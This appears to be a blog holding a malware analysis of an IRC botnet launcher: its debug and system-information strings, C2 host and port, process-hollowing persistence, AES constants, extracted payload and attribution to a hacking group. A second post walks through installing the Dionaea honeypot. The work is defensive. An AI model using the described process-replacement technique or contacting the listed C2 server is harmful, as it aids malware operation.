QUIT :exitting [sic]

Near these commands are strings that relate to debugging issues with the malware, including one string that is constructed during crashes that contains information about the CPU state at the time of the crash (in this case you see that it saves the state of the registers), along with some error messages.

debug
– Module “%s” reported a crash in “%s”: N=%u EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08X EDI=%08X EBP=%08X ESP=%08X EIP=%08X EFLAGS=%08X. Code: %08X (%s). %s…
Continuing
Restarting
EXCEPTION_FLT
EXCEPTION_INT_DIVIDE_BY_ZERO
EXCEPTION_STACK_OVERFLOW
EXCEPTION_NONCONTINUABLE_EXCEPTION
EXCEPTION_BREAKPOINT
EXCEPTION_ACCESS_VIOLATION
EXCEPTION_ILLEGAL_INSTRUCTION
EXCEPTION_OTHER

Many strings relate to system information, probably so that the controllers can inventory the systems in the botnet. The string USA is found in the beginning – perhaps this was generated dynamically since this sample was run on a machine located there. Other strings relate to CPU and memory information, uptime, networking information, firewall status, and storage information. One string seems to mention encryption along with the number 128 – perhaps this is a clue that the key is 128-bit, but I would like to find something in the disassembly that would back this up. Interestingly, you can also see that the bot seems to rate some of these aspects as Good, Avarage [sic] and Bad.

USA
System information – OS: Windows
). CPU: %s
MHz. Ram:
MB free. IPv6:
. Uptime:
day%s
hour%s
minute%s. Computername:
. User:
ProcessorNameString
HARDWARE\DESCRIPTION\System\CentralProcessor\0
Yes
no SP
Sysinfo thread
Network information – Host:
. Name:
. Type:
. IPv6:
. Firewalled:
. Latency:
, %u. IRC Uptime:
day%s
hour%s
minute%s.
Good
Avarage [sic]
Bad
LAN
Modem
Unknown
Netinfo thread
%sTotal drives:
, Total space:
MB free.
MB free
unknown
ramdisk
cd-rom
remote
fixed
removable
Drive information –
Driveinfo thread
thread
btg
debug
– btg tried executing an unreadable address. (%08X)
– No threads running.
– Listing
threads:
QUIT :changing server
link v
%s [Win32]
Uptime – System:
day%s
hour%s
minute%s. IRC:
day%s
hour%s
minute%s
Debug mode is %s.
off
Exe download server:
none
Exe download server:
f128enc+fab decrypted:
f128enc+fab encrypted: =

The network activity was pretty interesting to observe. As noted above, the malware connects via IRC to her.d0kbilo.com (37.59.118.41) on port 4466. There was actually quite a bit of plaintext in the traffic:

BEAR5

The nick that was assigned to my various instances all seemed to follow the same format of “d[a-zA-Z{7}]b”, trying to put it into some sort of pseudo-regular expression. I was able to confirm this by connecting to the server and trying to interact with the bot account from a remote location. If one tries to connect to the IRC server from the same IP, you get the following result:

BEAR6

Upon connecting to the server (independently, not as a malware instance), an operator account sets your user mode to +iwG (which makes the nick invisible, enables wallops message receipt, G which filters out certain words). Joining the malware C2 channel shows that the mode for the channel is set to +smntu, which makes it a secret channel; moderated; external messages disallowed; and only operators are allowed to change the topic (the +u is unknown). Malware nicks receive user mode +xi which makes them hidden and invisible (meaning the username is hidden and makes this nick hidden from /WHO and /NAMES commands when executed from outside the channel).

Trying to obtain a list of channels from my regular IRC client was unsuccessful (which was unsurprising, since the channels are set to be secret) but strangely an online IRC client did show some channels:

BEAR7

If you know a specific nick, you can still contact that person even if they are set to invisible. You can see in the following packets when I was sending traffic to the malware’s IRC instance, which was also a way that I was able to confirm that the nicks are plaintext and not obfuscated (though, the nicks themselves likely follow some sort of coding standard to help identify the victims):

I sent a /QUERY to the malware nick (my nick was gurdaptl and I was connecting from Kiwi IRC):

BEAR8

I created a channel called #flot and invited the malware nick there (no luck):

BEAR9

Apart from this, the only other activity I observed was that the malware would have a PING/PONG exchange with a user “e.TK” about every 90 seconds or so. I recorded about 40 minutes of such traffic but did not observe anything else.

Getting back to some of the other malware behavior, one thing noticeably absent was any indication of persistence – while running as a regular user (i.e., not with administrator privileges). I tried various tools (Autoruns, RegShot, GMER, etc.) to check for changes to the system and for some sort of persistence mechanism, but found nothing. Following a reboot, the malware did not appear to be running. Since I wondered if there was something preventing me from seeing the sample (some sort of hooking, etc.) I captured packets for about five minutes but observed no traffic to the malicious server or really anything out of the ordinary. I can’t imagine that you’d have a useful botnet that didn’t achieve persistence, but perhaps this is again a quirk of either my VM environment (user permissions, etc.) or merely the fact that I am running in a VM.

I re-ran the sample as administrator, and got some very different results this time in terms of how it attempts to both hide itself and achieve persistence. As a side note, I’m going to take an analytical leap of faith and say that this sample doesn’t escalate privileges due to the much different behavior observed when run as an administrator vs. a regular user.

First, the file does succeed in deleting itself after execution, along with the batch file. What was really interesting was the the malware then proceeds to create and replace a number of new processes every 60 seconds or so. The number of processes varied between runs, but ranged from as few as 4 to as many as 16. This long series looked like this (process name and PID):

1. [sample].exe, 3052
2. [sample].exe, 2848
3. winamp.exe, 212
4. winamp.exe, 2616
5. algs.exe, 864
6. algs.exe, 1004
7. logon.exe, 2220
8. logon.exe, 872
9. winlogon.exe, 2980
10. winlogon.exe, 420
11. spoolsvc.exe, 2572
12. spoolsvc.exe, 2536
13. spoolsv.exe, 2556
14. spoolsv.exe, 2476
15. lssas.exe, 2168
16. lssas.exe, 2264

I noticed that the malware always seemed to follow this pattern of creating two processes of the same name during this procedure. The final process in the list is then added to the registry to be run at startup, for example:

BEAR10

No matter the final process that is set to run at startup, it always gets stored in this same place in the registry, at least in my test environment.

Upon restart, I observed the final two steps in the procedure above repeat (i.e., 15 and 16). That was all – there wasn’t another series of processes created as in the original run. Looking at the image confirmed that this was definitely the malware and not a legitimate process after reboot:

BEAR11

Network Activity

The only anomalous activity detected in Wireshark was traffic between 37.59.118.41 (her.d0kbilo.com) on port 4466. Examination of the packets revealed some plain text which appeared to be IRC-related. In the strings recovered from the sample we see some of the same commands (e.g., USERHOST) as in the packets. The values passed to these commands, however, appears to be encrypted.

BEAR12
When I visited the C2 IRC server, it proclaimed that this was a modified version of the UnrealIRCd IRC server. What’s curious to me is that even though this software was modded by the malware author(s), the IRC commands seem to need to be passed in plain text.

Sitting in the C2 channel didn’t reveal anything. The mode set for you as an unregistered user prevents you from saying anything in the channel and the usernames for you and the other accounts in there are set to invisible. I found a document online apparently written by someone from uNkn0wn Crew and it refers to a couple of other channels, but nothing was going on in those either (though I did have voice enabled there, so I could talk in the channel but no one seemed to be listening or responding).

Disassembly/Debugging

One thing I noticed pretty early in this is that this sample does at least two things that makes disassembly and debugging more difficult. One is that many function calls are indirect, so you sort of have to switch back and forth between the disassembler and the debugger to see what is really being called when you see something like call dword ptr [eax+0Ch]. Here’s a screenshot showing some of this along with where I’ve inserted some comments so I can better keep track of what’s actually called:

BEAR13

The other thing is that this sample creates and replaces multiple new processes which makes debugging to be a real pain. I’m going to call out a few specific areas where I found something that looked interesting in this sample.

Starting at the function at 40204F, there’s a series of calls to GetModuleHandleA and GetProcAddress to get handles and addresses of various functions that will be used later for the process replacement:

BEAR14

Looking at it in both IDA Pro and Olly, this series of functions gets handles and addresses of:

tableoffunctions

The sub at 40224C finds the code to be written in the process replacement:

BEAR15

Then there’s a block to create the suspended process for future replacement:

BEAR16

Looking at this, I didn’t see a call to CreateProcessA, but I saw one of the parameters pushed on to the stack was 0x4. When you want to create a process in a suspended state, you pass 0x4 as the CreationFlags parameter. To confirm this, I checked it out in a debugger and we can see this at work for the first process that the malware spawns (in this case, it creates a suspended process of itself) and you can see that CreationFlags is set to CREATE_SUSPENDED in the stack in the bottom right:

BEAR17

Further along, we see a block of code at 402394 that loops and writes the malware to memory, and then once fully written, the block beginning at 4023D7 resumes the thread to complete the replacement:

BEAR18

After that overall function returns, the malware calls an exit function at 403608:

BEAR19

This sample appears to use AES. As previously stated, KANAL found the constants, which you can see here in this shot from IDA Pro:

BEAR20

I have a very high level understanding of AES, so I sort of know what to look for, but I couldn’t get through too much of the code that appears to deal with this encryption. First, here are a few things about AES:

– Block sizes are always 128-bits
– Key sizes are always either 128-, 192-, or 256-bits
– Using AES comprises the following steps. Note that the number of rounds depends on the size of the key – 10 rounds for a 128-bit key, 12 rounds for a 192-bit key, and 14 rounds for a 256-bit key.

  1. Key Expansion (round keys derived from cipher key)
  2. Initial Round
    1. Add Round Key (each state byte combined with a block of the round key)
  3. Rounds
    1. Sub Bytes (where the S-box comes into play)
    2. Shift Rows (transposition)
    3. Mix Columns (combining of 4 bytes in each column)
    4. Add Round Key (see above)
  4. Final Round
    1. Sub Bytes (S-box, again)
    2. Shift Rows (see above)
    3. Add Round Key (see above)

For more detail, please see the link in the references.

There is a loop beginning at 40121D that could be the Mix Columns loop as it iterates in 4-byte blocks:

BEAR21

Sub 401079 is where we first see the S-box being used:

BEAR22

One interesting thing can be seen later, in a sub at 4016A5. Here we see a function that works with the S-Inv box (MaybeSINVSubBytes) and there’s a local variable that is set to 0xE (14) that is used to loop. One thing we know from earlier is that the number of rounds for a 256-bit key should be 14, so perhaps this is a clue that we’re looking at 256-bit AES:

BEAR23

This represents some things I thought were interesting about this initial run of the malware. In this first run, what appears to happen is that the malware starts and finds several functions that are necessary to do process replacement. Following this, the sample decrypts data beginning at 4061C4 and then replaces the suspended process with this. Here is this section before decryption:

BEAR24

Here is a view of this area in Olly after decryption (you can see the MZ (4D5A) “magic number”):

BEAR25

I took all of this and dumped it from Olly into its own file, and then took a look in PEview:

BEAR26

Nice.

I’m not going to dive into this payload right now (will be a future analysis) however we can already see imports (DLLs like WS2_32, shell32, ADVAPI32) and plaintext strings:

BEAR27

I would have liked to have fully taken the crypto functions apart and recovered the key and the AES parameters in use, but I think that it’s good enough (at least for now) to have recovered the encrypted payload for further analysis.

Attribution

There were some interesting things found pertaining to attribution with this sample. The malware connects to her.d0kbilo.com, which sits behind a domain privacy provider, so nothing much to see in the whois lookup. There were multiple indications of IRC traffic (the Wireshark activity, the #Balengor string in the sample, etc.) so I decided to try to connect to her.d0kbilo.com. The regular IRC port failed but connecting on port 4466 (like the sample) succeeded. Interestingly, I was able to connect as a regular, unregistered user although my activities on the server were constrained. One of the initial messages greeting me on the server was that the box belonged to “uNKn0wn Crew” who apparently could be found at www.uNkn0wn.eu. It also mentioned an email address – iD@uNkn0wn.eu.

BEAR28

One of the few commands that I was allowed to execute on this server showed me the local time on the server, which placed it in the UTC+2 timezone. It’s certainly possible that this server had a random time zone set, but if this timezone is actually indicative of geography, this would actually put this server potentially in many places, from West Africa, to continental Europe, to Southwest Asia. IP address location services place the server in France or Spain.

BEAR29

I’ve found a few mirrors of defaced websites from uNKn0wn Crew and the names I saw associated with those were bebo and warbody. This was from 2004, however. In the #Balengor channel, which I presume is used for C2, there is a topic set by “k” which appears to be a base64 encoded string. Modes are set by an “e.TK” on the server. At this point, the possible identities I’ve seen from this group are:

– iD
– e.TK
– k
– bebo
– warbody

BEAR30

I can’t say that I’ve heard of this group or these people, though I would point out that there used to be a flash cartoon on newgrounds.com about a cat named Beebo, so maybe this person was a fan of that series.

Summary

It’s been an interesting and somewhat frustrating exercise to go through this sample due to all of the anti-analysis features in place here. Recovery of the payload is great, and my next step here is to analyze this sample. Even without the analysis of the payload, we do know that this sample adds the host machine to a botnet and allows robust C2 functions to be run on the victim machine. We also discovered something about the group responsible for it.

There wasn’t a name associated with this sample when submitted to the online sandboxes. Referring to it by its MD5 hash is cumbersome, so I’m going to assign this a name. Since this is related to botnets and this is the first part of a multi-part sample, I’m going with single syllable B reporting names. I’m going to call this one BEAR.

References:
csrc.nist.gov/archive/aes/rijndael/Rijndael-ammended.pdf
https://en.wikipedia.org/wiki/Advanced_Encryption_Standard

Findings and observations:
This sample is essentially a launcher for an encrypted payload. This overall malware package establishes C2 via IRC and allows for a robust level of control on infected machines. This malware also indicates that it can be used for typical botnet operations (e.g., scanning for new victims, exploiting targets, etc.)

Recommendations:
When this sample was run as a regular (unprivileged) user, it appeared unable to fully execute however it still did appear to establish C2. Keeping regular users in appropriate (non-admin) levels of access appears to impede this sample’s operations. Specifically, running as a regular user should prevent the sample from achieving persistence which would result in the sample being removed from the host upon reboot.

C2, for the time being, is located at her.d0kbilo.com (currently resolving to 37.59.118.41) on port 4466. Restricting access to this domain, IP address and port would impede or eliminate the C2 function.

Conclusion:
A skillfully executed bot client that uses multiple anti-analysis techniques to hamper the analyst.

Report: MalEXE001

Hashes:
MD5fcc038bc5b7297dffa9a78424c71674f
SHA1ba71062e5266b3e70e3e15b2d963ec7d5e375933
SHA256f6fb4bde73ca1fff1fc90cff03f5c8255467b8b3d7f54330f39ecc3fa48f0e51
ssdeep:1536:W/sLo8xocXN5U3FjAXScUC30SWEk4JgTqkKk6YqwFYtitK2TZ:WEL9okN5U3FjtQ0SWyJgT5D6wK2

 

I’m FRIENDLY-SCANNER, and so can you

For the TL;DR on setting up Dionaea, see below

Lately I’ve been pretty disappointed in the kinds of attachments I’ve been receiving in my various emailboxes. Adwind (both iterations) was pretty interesting to see, but I’m noticing that a lot of what I receive is just a more formatted, fancier 419 scam. I’m basically just seeing various versions of “I’m a Nigerian oil minister, please send me your bank details” in a document attachment. I’ve actually even gotten one sender to resend their attachment as a PowerPoint file.

A couple of things occur to me, one is that these might be files that take advantage of vulnerabilities in older versions of the software that I am running, so when I open them on my current test environments I’m not really seeing anything happen. Going forward I’m going to run much older versions of my applications to see if anything different happens. For instance, I just put Acrobat Reader 5.0 on one of my testing VMs and used that to open a recent attachment during examination (though nothing happened with this ancient version of Acrobat, either). Another explanation is that these might just be exactly what they appear to be — prettier versions of the same crap that fills my inbox on a daily basis, but not much more than that.

I think it’s OK to continue checking my email attachments for stuff to analyze, but I also recognize that I need better samples, ideally Windows executables which I’m more knowledgeable about than documents. I decided to try setting up a honeypot to see if I could get anything interesting. I ran into various roadblocks along the way before I got something up and running, but hopefully detailing what happened might help others avoid some of these issues.

The first thing I noticed is the somewhat fragmented state of the various open-source honeypots out there. Dionaea was the most recommended one from various sources, but the original site (http://dionaea.carnivore.it/) is out of service and most material I managed to find about the software was from several years ago. I tried another honeypot, Amun, but that seemed sort of defunct at this point also. The last update (from 2012) stated that it was still being maintained, but the documentation section had most of the links struck out so it was a bit hard to figure out exactly what to do with it.

I decided to use my testing machine as the host for the honeypot since it’s already running Ubuntu. I got Amun set up on it and got it running, but strangely there seemed to be very little activity (something on the order of 3-4 pieces of traffic over a 2-3 day period). This seemed VERY strange to me — I was thinking that there would likely be hundreds of scans per day at least. I tried various things to get things working better:
– Disabled firewall on the host
– I thought that maybe there was some issue with NAT or something else, so I added the host machine to the router’s DMZ
– Temporarily disabling all security features on the router and observing if there were any changes
– I tried connecting the host directly to the cable modem here, not going through the router at all

Finally after about five days, I ended up with six scans. Something just didn’t seem right.

I decided that I would have to give Dionaea a try. Installing using repositories didn’t work, so I had to find out everything I’d need to install manually and then install from source. I’d also need to find the source since the main site wasn’t around anymore.

This site had the best set of Dionaea docs I could find. You can also find some info about using Dionaea in Malware Analyst’s Cookbook in the second chapter (specifically, recipes 2-4 through 2-9). I installed Dionaea from PhiBo’s github repository, however I also mirrored it to my newly created one since I feel like the world could always use more copies of this lying around.

Here are the steps I followed, largely following the instructions from the readthedocs.io link above. For the benefit of anyone who doesn’t do this often (or maybe is doing this for the first time), I’m putting explicit directions on what commands to enter:

  1. Update packages:
    sudo apt-get update
    sudo apt-get dist-upgrade
  2. If you don’t already have it installed, install git:
    sudo apt-get install git
  3. Install all Dionaea dependencies (note the one in bold — if you try to install the original libnl-dev mentioned in the docs you’ll get an error about it not existing, but you can use libnl-3-dev instead):
    sudo apt-get install \
        autoconf \
        automake \
        build-essential \
        check \
        cython3 \
        libcurl4-openssl-dev \
        libemu-dev \
        libev-dev \
        libglib2.0-dev \
        libloudmouth1-dev \
        libnetfilter-queue-dev \
        libnl-3-dev \
        libpcap-dev \
        libssl-dev \
        libtool \
        libudns-dev \
        python3 \
        python3-dev \
        python3-yaml \
  4. Put the repository in /opt/dionaea (use either of the repositories above, as an example I’ll use the one I created):
    sudo git clone git://github.com/BYEMAN/dionaea.git /opt/dionaea
  5. Run the following commands:
    cd /opt/dionaea
    
    sudo autoreconf -vi
    
    sudo ./configure \
     --disable-werror \
     --prefix=/opt/dionaea \
     --with-python=/usr/bin/python3 \
     --with-cython-dir=/usr/bin \
     --with-ev-include=/usr/include \
     --with-ev-lib=/usr/lib \
     --with-emu-lib=/usr/lib/libemu \
     --with-emu-include=/usr/include \
     --with-nl-include=/usr/include \
     --with-nl-lib=/usr/lib
    
    sudo make
    
    sudo make install
  6. To start an instance of Dionaea, you can just run it as a super user but I typically run it as a daemon and put the PID in a file, as suggested in the Malware Analyst’s Cookbook
    sudo /opt/dionaea/bin/dionaea -p /opt/dionaea/var/dionaea.pid -D

    That should be all you need to do in order to get the software itself running. How it works for you once up and running is another topic.

Shortly after getting the honeypot running, I noticed LOTS of logging activity and within about 5 hours I observed 2700 scans had come in. Obviously much different than with Amun. Not sure why this happened, but I also didn’t look into it since I was just happy to have a honeypot up and running.

After a couple of days, I had collected lots of traffic and recorded many sessions but didn’t manage to collect any binaries, which is really what I’m after here. I did some reading online and I saw some suggestions that quite often any binaries come in over the ports for SMB (445) and MSMQ (1801 and others). Googling revealed that my ISP blocks these ports for residential customers (though not for business users), and checking with canyouseeme.org confirmed that my machine was unreachable through these ports. I needed to get something, somewhere that would allow me to run the honeypot without these restrictions.

Someone I know recommended getting something on Digital Ocean and setting up a honeypot there. I signed up with them and so far I have to tell you that I’m pretty thrilled with them. I got the cheapest “droplet” which comes to $5 a month, and set it up with Ubuntu 16.04 and the honeypot. You can confirm what ports are open on their systems with ping.eu, but I also emailed their support before I signed up and got the following response:

We do have a few restrictions, on UDP port 80 traffic, and SMTP over IPv6, both to prevent abuse and which cannot be lifted. Otherwise, we don’t any network restrictions, so as long as your software is compatible with the Linux or FreeBSD distributions that we offer, it should run just fine.

Another thing that I thought was nice about them is that you can locate your droplet in datacenters in various parts of the world. I picked one in NYC, but I’m thinking about getting some set up in other regions to see if I get different traffic there. If you want to sign up, use this link and you’ll get $10 in credit from Digital Ocean assuming you’re new to them.

I spent an evening getting my droplet set up and installing Dionaea, and then let it run overnight. At 0753 the next morning:

ls-l

And look how it begins:

mz

Nice.

Oh yeah, referring to the title — one of the first scans I received was from something identifying itself as “FRIENDLY-SCANNER”. Seems legit.